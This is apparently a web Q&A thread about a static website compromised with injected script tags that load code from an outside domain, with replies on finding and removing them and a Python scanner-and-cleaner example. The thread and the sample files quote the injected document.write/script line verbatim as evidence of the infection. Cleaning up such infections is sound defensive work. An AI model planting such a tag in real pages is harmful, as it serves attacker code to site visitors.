Dear Community members,

The home page of our static HTML website http://www.iffort.com is transferring data from a mysterious website, rawalrohi.com. You can check this by going to iffort.com and noticing the footer there. It says "transferring data from rawalrohi.com".

From our side we did the following things to rectify the issue:

a.) Analyzed the source code of all pages. We checked the code and found out that a script src=http://rawalrohi.com/images/ART.php was inserted in all pages. We removed this script from all the 'html' pages of the website.

b.) Next we spoke to the hosting company; they said they can provide us a backup of the site. We have the backup but haven't used it to restore the site.

c.) Lastly, we have changed the FTP password, because we were told that somebody could have hacked our FTP password.

Despite doing this, the home page still says "transferring data from rawalrohi.com". The view source doesn't reveal the URL. This is slowing down our website.

Any help is greatly appreciated.

+3  A: 

Your page references a file called "js/hyperlinked_Images.js". Have a look at this file, right near the bottom:

...
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');

Now if you'll excuse me, I'm going to run a quick AV scan on my system ;)

FrustratedWithFormsDesigner
Thanks for the reply. Are we supposed to remove that as well? I mean the js file?
Daksh
Yes you probably should remove that, unless you know why it's there.
FrustratedWithFormsDesigner
Just removed the last 3 lines in that code. Uploaded the new file. Anything else which needs to be edited?
Daksh
I'm not sure, but it sounds like you need to do a very detailed audit of the files on your server. Maybe search all files in your hosting directory for "rawalrohi" and clean them up. The other option would be to just reformat your server, reinstall your server software and reinstall the site, assuming your backup of the site is not tainted. The main problem with this approach is the downtime. Also, not all hosting companies will let you do that (or do it for you).
FrustratedWithFormsDesigner
Yeah, you are right, a lengthy process. Right now I searched the hosting directory for "rawalrohi" and found nothing.
Daksh
Btw, they provided a backup of 15th October.
Daksh
A: 

I just recently saw this on a client's website; a different URL, but the same type of code injection was in all of their files. To fix the problem, I downloaded the site and used Visual Studio to do a sitewide "find & replace" on the string. This solved the problem for me. I suggest you do something similar for all files; you might have missed one. My client's site had html/htm/aspx files that were all infected, and the ISP made the same statement that the FTP password was probably compromised...

Zachary
Thanks Zachary. The hosting companies are pretty reckless in their behavior. Will see what we can do; will perhaps download all the code.
Daksh
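The two suggestions above (search the whole hosting directory for the injected domain, then do a sitewide find & replace on a downloaded copy) can be done in one pass with a small script. What follows is an added example for this thread, not code from any poster: it walks a local copy of the site, reports every injected tag that references the given domain, and strips it, keeping an `.infected` copy of each changed file for review. It matches both forms seen in this thread, the bare `<script src=...></script>` tag in HTML and the same tag emitted from `document.write('...')` in a `.js` file (where `</script>` appears as `<\/script>`). The domain and file names come from the thread; the sample file contents, the `.infected` naming and the helper names are constructed for illustration. A plain domain match like this will not catch a loader that hides the URL behind hex escapes or `eval(unescape(...))`, so anything in the tree that looks obfuscated still needs a manual look.

```python
"""Find and remove <script src=http://DOMAIN/...> injections in a downloaded
copy of a static site. Added example, not any poster's code; sample files
and helper names are constructed for illustration."""
import re
import shutil
import tempfile
from pathlib import Path

# Extensions the thread reports as infected (html/htm/aspx) plus .js, where the
# first answer found the document.write() version, and .php for completeness.
SCAN_SUFFIXES = {".html", ".htm", ".aspx", ".js", ".php"}


def injection_pattern(domain):
    """Regex for an injected <script> tag loading from `domain`, either bare
    or wrapped in document.write('...'). The wrapped form is listed first so
    the whole document.write(...) statement is matched, not just the tag."""
    d = re.escape(domain)
    tag = (r"<script[^>]*src\s*=\s*['\"]?https?://" + d + r"[^>]*>"
           r"\s*<\\?/script>")                    # </script> or JS-escaped <\/script>
    wrapped = r"document\.write\(\s*['\"]" + tag + r"['\"]\s*\)\s*;?"
    return re.compile("(?:" + wrapped + ")|(?:" + tag + ")", re.IGNORECASE)


def scan_tree(root, domain):
    """Return [(relative path, line number, matched text)] for every
    injected tag under `root`. Read-only; use it first to see what was hit."""
    root = Path(root)
    pat = injection_pattern(domain)
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        # errors="replace" keeps the scan going on odd encodings; fix the
        # encoding before cleaning if the site is not UTF-8.
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            for m in pat.finditer(line):
                hits.append((path.relative_to(root).as_posix(), lineno, m.group(0)))
    return hits


def clean_file(path, domain):
    """Strip injected tags from one file, keeping the original beside it as
    <name>.infected for review or rollback. Returns how many were removed."""
    path = Path(path)
    text = path.read_text(encoding="utf-8", errors="replace")
    cleaned, removed = injection_pattern(domain).subn("", text)
    if removed:
        shutil.copy2(path, path.with_name(path.name + ".infected"))
        path.write_text(cleaned, encoding="utf-8")
    return removed


def clean_tree(root, domain):
    """Clean every scannable file under `root`; returns {relative path: count}."""
    root = Path(root)
    result = {}
    for path in sorted(root.rglob("*")):   # materialised before any .infected file is written
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            n = clean_file(path, domain)
            if n:
                result[path.relative_to(root).as_posix()] = n
    return result


# Constructed sample site mirroring what the thread describes: a tag in the
# HTML and the same tag document.write()d twice near the bottom of the .js.
SAMPLE_FILES = {
    "index.html": "<html><body>Hi</body>"
                  "<script src=http://rawalrohi.com/images/ART.php ></script></html>\n",
    "js/hyperlinked_Images.js":
        "function show(){}\n"
        "document.write('<script src=http://rawalrohi.com/images/ART.php ><\\/script>');\n"
        "document.write('<script src=http://rawalrohi.com/images/ART.php ><\\/script>');\n",
    "clean.html": "<html><body>clean</body></html>\n",
    "logo.png": "not scanned",
}


def build_sample_site(root):
    for rel, content in SAMPLE_FILES.items():
        p = Path(root) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content, encoding="utf-8")
    return root


def demo():
    """Scan, clean and re-scan the constructed site; returns all three results."""
    root = build_sample_site(tempfile.mkdtemp())
    hits = scan_tree(root, "rawalrohi.com")
    removed = clean_tree(root, "rawalrohi.com")
    return hits, removed, scan_tree(root, "rawalrohi.com")


if __name__ == "__main__":
    before, removed, after = demo()
    for rel, lineno, text in before:
        print(f"{rel}:{lineno}: {text}")
    print("removed:", removed, "remaining:", len(after))
```

Run `scan_tree()` against the downloaded copy first and read the hits before cleaning; once the tree is clean, diff it against the hosting company's backup before re-uploading, since a backup taken after the compromise will carry the same injection.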
A: 

Make sure your antivirus is on. Whenever your website loads a funny external script like adware or spyware, your antivirus will alert you.

i need help
Using McAfee antivirus. It is always on. Never alerted me about anything suspicious :(
Daksh
Antivirus apps will never catch everything. It's always possible for some things to get through them.
FrustratedWithFormsDesigner
+1  A: 

Make sure you don't use one FTP account for everything; control the FTP user accounts. It will help you to manage your website.

Shiro
Hi Shiro, sorry, can you please elaborate on this?
Daksh
+1  A: 

I've seen similar behaviour a while back. In that specific case, the FTP password was compromised: it was read from the client's desktop PC by malware that collected stored FTP passwords.

We found this out only after the password was changed and compromised again within a few days.

So make sure you scan all machines that 'know' the FTP password with a decent AV scanner.

Jacco